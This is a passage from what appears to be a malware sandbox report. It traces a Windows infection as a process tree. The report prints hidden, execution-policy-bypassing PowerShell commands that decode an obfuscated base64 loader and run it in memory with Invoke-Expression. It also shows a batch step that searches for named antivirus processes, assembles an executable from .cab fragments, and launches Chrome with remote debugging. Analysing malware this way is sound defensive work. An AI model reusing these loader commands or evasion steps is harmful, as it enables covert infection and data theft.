3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:944
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364641121\2GF9eeb.cmd"
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1468
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364641121\2GF9eeb.cmd"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1932
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2244
                                              • C:\Users\Admin\AppData\Local\Temp\10364650101\FMXv4s3.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364650101\FMXv4s3.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2888
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 2888 -s 28
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:2776
                                              • C:\Users\Admin\AppData\Local\Temp\10364660101\EPTwCQd.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364660101\EPTwCQd.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:1760
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 1760 -s 28
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:1608
                                              • C:\Users\Admin\AppData\Local\Temp\10364670101\Rm3cVPI.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364670101\Rm3cVPI.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1700
                                              • C:\Users\Admin\AppData\Local\Temp\10364680101\7IIl2eE.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364680101\7IIl2eE.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                PID:2860
                                                • C:\Windows\SysWOW64\CMD.exe
                                                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                  4⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2376
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1500
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr /I "opssvc wrsa"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1744
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1220
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1748
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c md 418377
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2328
                                                  • C:\Windows\SysWOW64\extrac32.exe
                                                    extrac32 /Y /E Leon.cab
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:524
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr /V "BEVERAGES" Compilation
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2568
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2720
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:592
                                                  • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                    Passwords.com N
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:336
                                                  • C:\Windows\SysWOW64\choice.exe
                                                    choice /d y /t 5
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2008
                                              • C:\Users\Admin\AppData\Local\Temp\10364690101\1966025ad2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364690101\1966025ad2.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1476
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 384
                                                  4⤵
                                                  • Program crash
                                                  PID:1712
                                              • C:\Users\Admin\AppData\Local\Temp\10364700101\u75a1_003.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364700101\u75a1_003.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2488
                                              • C:\Users\Admin\AppData\Local\Temp\10364710101\TbV75ZR.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364710101\TbV75ZR.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2024
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 2024 -s 44
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:2168
                                              • C:\Users\Admin\AppData\Local\Temp\10364720101\UYpk7xI.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364720101\UYpk7xI.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2968
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 2968 -s 44
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:1424
                                              • C:\Users\Admin\AppData\Local\Temp\10364730101\f14e0f0113.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364730101\f14e0f0113.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2040
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 2040 -s 64
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:456
                                              • C:\Users\Admin\AppData\Local\Temp\10364740101\70badeca19.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364740101\70badeca19.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2568
                                              • C:\Users\Admin\AppData\Local\Temp\10364750101\b62ac4cd56.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364750101\b62ac4cd56.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1716
                                              • C:\Users\Admin\AppData\Local\Temp\10364760101\6bf6babdeb.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364760101\6bf6babdeb.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2500
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:868
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6719758,0x7fef6719768,0x7fef6719778
                                                    5⤵
                                                      PID:2040
                                                    • C:\Windows\system32\ctfmon.exe
                                                      ctfmon.exe
                                                      5⤵
                                                        PID:1960
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1224,i,2622945663070205823,6242870015746217268,131072 /prefetch:2
                                                        5⤵
                                                          PID:944
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
